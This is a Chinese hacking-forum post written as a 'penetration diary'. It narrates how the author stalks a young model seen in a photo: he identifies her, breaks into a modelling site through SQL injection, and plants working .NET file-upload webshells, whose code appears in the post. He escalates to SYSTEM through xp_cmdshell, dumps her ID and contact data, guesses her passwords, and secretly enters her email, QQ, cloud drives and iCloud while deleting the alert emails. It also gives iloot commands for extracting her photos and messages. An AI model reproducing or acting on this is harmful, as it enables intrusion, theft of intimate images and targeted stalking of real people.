响应90大大的号召。。。。
这文章原本是发在90sec的,现在挪到ihonker
201x年8月10日 星期二 天气晴 宜搞站禁撸管
我是小明,性别男爱好女,年满18,优质单男。作为18岁的我,什么sex8、sis100、草榴、91porn等等,这些18岁以前的兴趣已经变为逝去的青春,作为一个成年人,我应该做些为国为民的大事。
到底做什么大事呢?就在此时小木哪王八羔子发来一张图,尼玛今天禁撸管啊,只有撸站了。
经我放大仔细观察,大胸蜂腰肥臀,尼玛我是干大事的人,这种低级观察应该属于我失去的青春了。
0x01搜集信息整理思路
1.使用google、百度图片搜索寻找图片出处
2.图片属于艺术照,猜测十有八九是嫩模,注意力集中主要模特网站
ps:看着这张图我只能想到这两点,还有新看法的朋友请留言
通过搜索引擎得到很多信息(信息价值的判断很大程度上取决于经验,有些你感觉没用的信息或者忽视的信息,说不定大牛就会有很多其他的想法),在这里对比下百度和google图片搜索,google成功率高、有用信息多,当然也不能放过百度(说不定日了狗了呢),通过这样的图片搜索,搜索出很多可能有用信息的可能性10%左右,但是让我们确定她是谁的可能性还是很高的,我们不需要知道她的真实姓名,我们只要知道他的代号就行(不管是不是真实,但是是她常用的)。
从初步搜索我提取出几个有用信息:xxx 模特 水印中提取到网站 微博等信息,然后再通过搜索引擎发散搜索我提取到的信息,依次搜索记录提取(在此切记不要走“线型路”,要一层一层搜索整理提权完再进行下层次搜索)。
对于这种网络嫩模,确定了几个重要点:x空网 x0x0网 腾讯微博 新浪微博(确定有用小信息:使用iphone 常住地北京 最近做什么 个人网络关系),以上都是细致的体力活,你一定这么认为,其实不然,在搜索的过程中头脑清新是很重要的,很多时候看着各种信息你的灵感就会来了。
0x02重点攻破
1.查库x空网,拖取个人资料,反复收集查库,整理资料(不细说,都懂的struct2漏洞泛滥的时候,可把人累惨了)。
2.由于x0x0网是她最近注册和常使用,有艺术照和自拍生活照,初步判断是本人(此人不是很出名没有签约公司,没有经纪人(微博收集)),有必要拿x0x0数据。
确定了目标,喝杯咖啡,来口浓茶,吸根中南海。
使用wydomain等工具收集二级域名(ps:手动在google收集二级域名或者挂代理使用wydomain,手动使用site:xxx.xxx.xxx -www|mail|vpn顺便也可以搜下有没有报错网页)。
分析每一个二级网站:web程序、web容器、web服务器、各个子域名相互关联(直接关系:同服?同段?······间接关系:业务?功能?······)
通过分析得知主站程序为xxx,其中3个二级域名都指向主站,一开始被这几个站迷惑了以为就是一个站,事实上也是一个站,不同的是,不同二级域名对网站目录的访问权限不一样,有的二级域名可以访问到一些文件,有些却不能访问。通过对比分析找到xxx.xxx.xxx访问主站权限最大,web程序为已知程序,搜索相关漏洞(ps:wooyun主站你懂的,还有一个技巧不知道大家发现没有,有时候非通用漏洞中会出现0day,可能漏洞提交者没有发现这个程序是什么程序,黑盒测试出了漏洞,然后提交了wooyun。其实这个程序是一个通用程序并且黑盒测试出的漏洞竟然是0day。不要不相信,尼玛我就遇到了,就是此例子,是一个.net程序)。
最后通过注入获得了女神数据,但是尼玛搞站不拿到服务器我不爽啊!这种战略资源被入库怎么对的起党和人民,继续,得知数据库为sqlserver 2008 dbo权限:
思路1:找后台,尼玛没找到,被权限掉了(注入出密码加密方式你懂的 .net的自写函数,需自己找到key破解,当时sb的下载源码反编译dll写出解密程序,最后没找到后台,事实告诉我们一定要先找后台,手工注入出一堆数据 还解密了,最后没后台,此时心情千万只草泥马胸中奔腾)
思路2:数据库直接写shell(通过报错得到路径),此时不要看我就一句话“数据库写shell”,其实有一句话这么说的,“纸上得来终觉浅,绝知此事要躬行”
此时是.net程序,差异备份导shell有两种方法:数据库差异 和 日志差异,导入的一句话脚本一般可以有3种asp、vb语法.net、c#语法.net,一般成功率高、出错小的是asp一句话,但此处不支持asp,在.net一句话中:
[C#] 纯文本查看 复制代码 <%if(Request.Files.Count!=0){Request.Files[0].SaveAs(Server.MapPath(Request["f"]));}%>
Vb版本:
<%If Request.Files.Count<>0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")))%>
这两个可用,其他都是坑(这不是菜刀可连接一句话,只是一个文件上传小马)
客户端:
<form action="..." method="post" enctype="multipart/form-data">
<input name='0' type="file" value=""/><br>
<input type="submit" value="提交">
</form>
此时坑还没有结束,关于getshell一定要搞清楚权限,渗透就是一个权限提升过程,搞清楚自身所处的权限以及自身权限和其他权限的高低等级相互作用关系。现在我们所处的是数据库的权限我们备份成功了一个小马,然后我们利用小马拉大马,当我们转到小马身上的时候权限已经转变了,我们现在权限变成了web脚本权限,坑来了 web脚本权限在很多目录不可写,此时寻找可写目录,一般程序都会有自己的上传目录缓存目录等等可写目录,坑必然是不会结束的,这可写目录如果管理来个脚本不能解析不就GG了。最后又只能回到我们的数据库权限去备份,尝试各种cmd小马或菜刀小马,多次备份上取(如果日 了狗了有一次成功了呢?差异本分会包含很多杂乱数据影响代码执行,所以差异备份还得有点运气)。我运气没那么差,找到缓存目录上传菜刀小马,自此成功。
上webshell后东翻翻西找找sa密码到手,xp_cmdshell system权限。(ps:现在你如果没有什么溢出0day或者正好遇到爆溢出刚不久,你想本地溢出提权很难,大部分数据库提权比较靠谱,还有可能提不了权,直接http sock5进内网),看官一定在说内网内网,我说没有内网你信么?(内网对我的作用不大,内网是到它的主公司去了,这个网站只是它主公司旗下的一项业务而已)。
现在我已经收集到很多数据了,qq号、手机号、常用邮箱、常用密码、真实生日、身份证、真实姓名、工作、常住地等等基本信息(ps:这些嫩模网上能够很容易百度的信息 基本都是假信息,什么生日 姓名都是假的,还是要身份证来的真实)
对于搞站还是那句话,“纸上得来终觉浅,绝知此事要躬行”,现在很多文章都只是介绍什么什么方法,但到了使用的时候,你绝壁发现不是那么回事,各种坑需要填,这就要靠基本功和经验了。
0x03 密码组合以及登录尝试
得到了这么多东西,感觉中 各种裸露照正在向我招手。
1.密码组合,一般人设置密码有一个特点,“组合密码”,他会组合他熟知的信息,如一个叫王小东生于1991年5月6日的人,他密码设置为wangxiaodong19910506或wxd19910506,再比如一个人他的所有密码都有一个相同的头部angelin,比如他在90sec注册账号他密码就是angelin90sec,在baidu注册账号就是angelinbaidu,相关东西可以看下https://github.com/Tycx2ry/Butch ... 6%80%9D%E8%B7%AF.md这篇文章。
2.与业务相结合的密码组合,比如icloud需要密码的格式是有大小写字幕数字且超过8位,所以登录前查清楚相关应用密码策略
3.登录尝试:
a.邮箱尝试,一般现在登录都会记录登录地点,所以我们收集信息的常住地有了作用,找个他常住地的vpn或者肉鸡,登录邮箱然后翻阅邮件,技巧1:使用邮箱内置搜索,如:搜索关键字 密码、用户、身份证等。技巧2:查看目标未查看过邮件,查看完一定再标记为未读邮件(以前傻乎乎的不知道这个功能,还不敢看未读邮件)。技巧3:留意注册邮件,邮件有某某网站注册确认信息,表示此邮箱为注册邮箱,必然是我们下个登录尝试目标。
b.qq登录尝试,常用地vpn和肉鸡不多说,一定不要傻乎乎的去直接的登录qq,被发现率90%,最好在夜深人静的时候用qq的其他业务的登录,什么邮箱啊,云盘啊
c.云盘登录尝试,你懂的美女自拍太多需要存储太多照片,云盘是很多的选择,如:icloud(使用率最高,嫩模还有不用iphone的么)、qq微云(还存qq离线文件)、百度云盘(还存短信)、360云盘。在云盘尝试中百度最坑,第一次登陆他要验证(手机和邮箱验证),一般我就飞一般的速度邮箱验证(如果验证邮箱是qq邮箱请谨慎,微信有提示,其他邮箱一定要检测是否设置短信提示),建议月黑风高好作案。
5.利用邮箱和云盘中信息各大电商网站(密码对与不对80%你可以尝试出正确密码,20%只有密码找回,请别登录淘宝,作死率最高),电商网站中什么蘑菇街之类的女性购物网站最是给力,其中有一项功能是让用户输入身体各种尺寸,你懂的。
0x04 手机尝试
什么地方私密信息最多,当然是手机,而作为手机中的战斗机iphone,这是重点中的重点,iphone中的重点是icloud。
如果你像我刚开始傻乎乎就去登录icloud,你绝对会是个悲剧,自从icloud被曝了艳照以后,尼玛只要你登录一次 就会有一封邮件,等一次有一封,刚开始我用icloud的windows工具登录了,web等了,用硬件设备去登录了,然后你懂的分分钟被发现,如果是qq邮箱发现率可高达99.9%。
1.apple id密码尝试,大小写字幕数字且超过8位(一般修改它常用密码首个字母或者单词为大写,成功率50%(尝试过20个以上美女得出结论))
2.尝试登录web icloud,时间绝笔要是月黑风高,然后快速删除邮件。web icloud上你懂的自拍通讯录 必须有(事实上也有很多没有同步)
3.同步云备份,这上边就有很多东西了,同步云备份需要工具,尝试了很多(尼玛全部都是收费的,说是免费,一道关键东西就来请下载专业版,还特贵几百刀),最后iloot工具基本是唯一选择。
4.iloot的使用:
全部拖:iloot.py appleid password
只拖相关数据:iloot.py appleid password --item-types photos,movies,sms,call_histery (图片只拖.jpg 视频只拖.mov,可自行修改源码换其他后缀)
拖指定域:iloot.py appleid password --domain com.tencent.xin 只拖微信域
你以为这样就能成功了,告诉你,你实际尝试的时候各种坑等着,1.安装的时候按照它说的方法,你绝壁不能成功,有些库需要自己到googlecoode手动下载安装,2.此工具没有断点续传,你一来就拖全部,只能告诉你天真,多次使用,得出结论,必然断,然后再重来,然后又断,所以你最好指定域指定域中相关数据,慢慢来。
5.拖回来数据处理,短信记录必然有,sqlsite的,通话记录有,拖微信域,在他目录下qrcode目录中可以找到二维码,可以加女神微信,什么美图相机应用(尼玛使用率真高),关于微信聊天和qq聊天记录的解密还没有找到方法?我想应该是有办法的,因为我已经知道了qq账户和密码,还得继续研究(不过用微信传视频是可以拖出来看),有没有可能拖出cookie,欺骗登录?(书到用时方恨少,不会ios开发)
自此我们掌握了女神的邮件、短信、通话记录、自拍照、自拍小视频,购物记录(ps:冒充送快递)
0x05 未能做到的尝试和总结
手机种马,电脑种马,小明能力有限还在学习,我还是个孩子。
本文很多都是经验之谈,可能有些理解错误,请看官指导,有更好的方法请指教
请期待下一篇:【小明渗透日记】小明要租房 | 
发表于 2015-6-8 13:52:46
发表于 2015-6-8 14:04:00
